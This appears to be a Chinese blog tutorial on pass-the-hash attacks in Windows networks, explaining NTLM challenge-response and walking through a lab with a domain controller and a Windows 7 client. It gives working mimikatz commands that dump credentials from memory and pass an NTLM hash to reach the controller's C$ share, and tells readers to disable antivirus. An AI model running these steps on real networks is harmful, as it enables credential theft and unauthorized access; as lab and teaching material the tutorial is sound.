内网渗透(哈希传递)

概念

早期SMB协议明文在网络上传输数据,后来诞生了LM验证机制,LM机制由于过于简单,微软提出了WindowsNT挑战/响应机制,这就是NTLM。

哈希传递前提

同密码(攻击主机与实现主机两台要密码一致)。

NTLM协议

加密ntlm哈希

转换成16进制------转换成加密------转换成MD4

NTLM协议:用于远程登录。例如 22

原理

  1. client(win10)将账户名(test)传给server。
  2. 在server中判断本地账户名(test)是否存在,没有就失败,有的话生成challenge(随机生成的),查找user对应的NTLM哈希(在sam里找),使用哈希加密challenge,生成一个net-ntlm hash存在内存中,将challenge发送给client(win10)。
  3. client(win10)接受到challenge以后,将自己的密码转换成NTLM哈希,用生成的哈希加密challenge生成response,将response发送给server。
  4. server对比自己内存中的net-ntlm hash与client(win10)发来的response是否一致。

哈希传递攻击

哈希传递攻击的前提

  • 首先是管理员,必须提前从不同用户变成管理员
  • 需要用户名和ntml哈希值
  • 如果对方主机在域内,就使用域名;如果不在域内,就使用工作组环境的攻击方式

什么情况下会用哈希传递攻击

  • 攻陷一台主机以后,抓不到该主机用户的明文密码
  • 失陷主机和局域网内存在相同密码

哈希传递攻击

工具:mimikatz

环境:域控(server 2008)、客户机(win 7)

网段:在同一网段,都为NAT模式

域控(server)

  • 静态IP:10.1.1.1

在server中查看445是否开放

  • 查看域控C盘
  • 共享C盘(在cmd中输入命令net share

客户端开始攻击(win7)

  • IP:10.1.1.2

  • 关闭杀毒软件

用mimikatz64位工具,必须是system权限

在打开cmd命令解释器必须以管理员身份运行(因为要用到mimikatz工具)

进入mimikatz.exe

攻击利用

  • 提升权限(注:需以管理员权限运行)
bash 复制代码
privilege::debug
  • 获取内存中保存的登录信息
bash 复制代码
sekurlsa::logonpasswords 
  • 并抓到自己用户的哈希值(NTLM)
  • 进行哈希攻击
php 复制代码
sekurlsa::pth /user:administrator /domain:xiusafe.com /ntlm:32ed87bdb5fdc5e9cba88547376818d4  #pth是哈希传递,domain后面跟的是域
  • 同时弹出一个新的cmd窗口

此时哈希值已经准备好,但还未攻击

开始攻击

  • 查看域控(server)C盘
php 复制代码
dir \\10.1.1.1\c$
  • 与域控C盘进行对比
  • 攻击成功

总结

哈希传递攻击是由于局域网内有多台主机存在相同密码造成的,绕过ntlm认证。

相关推荐
腾科张老师15 分钟前
OSPF 典型组网
网络·智能路由器
野渡拾光1 小时前
【考研408数据结构-05】 串与KMP算法:模式匹配的艺术
数据结构·考研·算法
tainshuai3 小时前
用 KNN 算法解锁分类的奥秘:从电影类型到鸢尾花开
算法·分类·数据挖掘
2301_801673015 小时前
8.19笔记
网络·安全
三坛海会大神5559 小时前
计算机网络参考模型与子网划分
网络·计算机网络
云卓SKYDROID9 小时前
无人机激光测距技术应用与挑战
网络·无人机·吊舱·高科技·云卓科技
Coovally AI模型快速验证9 小时前
农田扫描提速37%!基于检测置信度的无人机“智能抽查”路径规划,Coovally一键加速模型落地
深度学习·算法·yolo·计算机视觉·transformer·无人机
pusue_the_sun9 小时前
数据结构:二叉树oj练习
c语言·数据结构·算法·二叉树
RaymondZhao3410 小时前
【全面推导】策略梯度算法:公式、偏差方差与进化
人工智能·深度学习·算法·机器学习·chatgpt
zhangfeng113310 小时前
DBSCAN算法详解和参数优化,基于密度的空间聚类算法,特别擅长处理不规则形状的聚类和噪声数据
算法·机器学习·聚类